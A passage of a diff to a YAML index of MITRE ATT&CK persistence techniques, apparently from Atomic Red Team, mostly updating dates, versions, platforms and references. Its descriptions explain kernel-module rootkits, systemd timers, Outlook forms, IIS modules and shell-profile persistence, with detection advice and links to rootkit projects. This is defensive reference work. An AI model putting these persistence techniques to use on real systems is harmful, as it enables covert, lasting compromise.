+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests:
     - name: Linux - Load Kernel Module via insmod
@@ -39391,7 +39814,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -39417,12 +39840,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -39500,9 +39921,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests:
     - name: Create Systemd Service and Timer
@@ -39640,7 +40060,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -39662,41 +40082,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -39705,22 +40094,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -39786,7 +40202,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -39860,11 +40275,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -39881,7 +40295,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -39891,7 +40304,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -39900,19 +40313,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -39960,11 +40371,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -39993,24 +40405,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -40045,9 +40459,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -40107,7 +40518,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -40132,13 +40543,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -40191,8 +40600,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -40240,78 +40649,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -40359,6 +40701,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -40369,9 +40715,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -40380,8 +40730,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
